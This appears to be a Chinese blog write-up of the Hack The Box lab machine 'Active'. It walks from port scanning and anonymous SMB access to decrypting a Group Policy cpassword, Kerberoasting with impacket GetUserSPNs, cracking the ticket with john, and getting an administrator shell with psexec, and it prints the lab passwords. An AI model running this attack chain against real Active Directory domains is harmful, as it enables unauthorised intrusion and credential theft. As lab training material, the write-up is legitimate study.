HTB 学习笔记

【Hack The Box】windows练习-- Active

文章目录

  • HTB 学习笔记
  • 信息收集
  • Kerberoasting
  • 登陆


信息收集

53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  tcpwrapped
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Aggressive OS guesses: Microsoft Windows 7 SP1 (95%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 (95%), Microsoft Windows Windows 7 SP1 (95%), Microsoft Windows Vista Home Premium SP1, Windows 7, or Windows Server 2008 (95%), Microsoft Windows Vista SP1 (95%), Microsoft Windows 7 Ultimate (93%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows 8 (93%), Microsoft Windows 7 SP1 or Windows Server 2008 (92%), Microsoft Windows 8.1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

88 上的 Kerberos,139 上的 netbios-ssn,389 和 3268 上的 ldap

首先开始我们最熟悉的端口,139
我们可以使用namp带着插件扫描他,看看会不会有漏洞
然后再对smb进行一些枚举

这里关于smb的枚举,我们也许有很多种选择

activem安装为win服务 active windows_Hack The Box


就像我自己的清单中这样,但是我要说的是叽里呱啦用了一大堆,最后发现smbmap真的香smbmap -H 10.129.8.86

枚举出了有一个这个用户具有读的权限

那就登陆呗,如果要密码那就拜拜,下一个服务

activem安装为win服务 active windows_activem安装为win服务_02

smbclient //【ip】/【用户】 很辛福,不需要密码,最后在一大堆文件夹里找到我有意思的东西,我们get 到本地,然后打开

activem安装为win服务 active windows_Hack The Box_03

我们可以看到它并不是password,而是cpassword,这是组策略密码

而关于组策略密码我们有专门的破解工具

activem安装为win服务 active windows_microsoft_04

我们使用gpp-decrypt xxxxxxxxxxx(xxx是组策略密码)

activem安装为win服务 active windows_microsoft_05

得到密码,而后我们可以再次以用户名等信息登陆smb,就可以得到user.txt

GPPstillStandingStrong2k18

Kerberoasting

关于这个攻击最常见的就是获取哈希票据,然后爆破开就行,是哪个用户就是哪个用户
但前提是我们需要知道相关的用户

Kerberos 是一种用于 Windows Active Directory 环境中的身份验证协议(尽管它也可用于 Linux 主机的身份验证)
当您想使用 Kerberos 对某些服务进行身份验证时,您可以联系 DC 并告诉它您要对哪个系统服务进行身份验证。 它使用服务用户的密码哈希加密对您的响应。 您将该响应发送到服务,该服务可以使用其密码对其进行解密,检查您的身份,并决定是否要让您进入。
在 Kerberoasting 攻击中,您将使用离线暴力破解与服务关联的密码,而不是从 DC 向服务发送加密票证。
所以这个攻击具有极高的速度,因为他是离线的,所以不用担心被ban,第二他是安全的,因为他是离线的所以不会留日志

./GetUserSPNs.py -dc-ip 10.129.8.86 active.htb/SVC_TGS。 --先用这个枚举用户
./GetUserSPNs.py -dc-ip 10.129.8.86 active.htb/SVC_TGS -request --在用这个获取票据

而通常用impacket包的脚本来运作,他们还可以干更多的事情,不过我离全部掌握它们还差得远

activem安装为win服务 active windows_windows_06


我们需要把这个加入一个文本然后用john爆破

john admin.txt --wordlist=/usr/share/wordlists/rockyou.txt

activem安装为win服务 active windows_Hack The Box_07

得到密码

Ticketmaster1968

登陆

./psexec.py administrator@10.129.8.86

activem安装为win服务 active windows_Hack The Box_08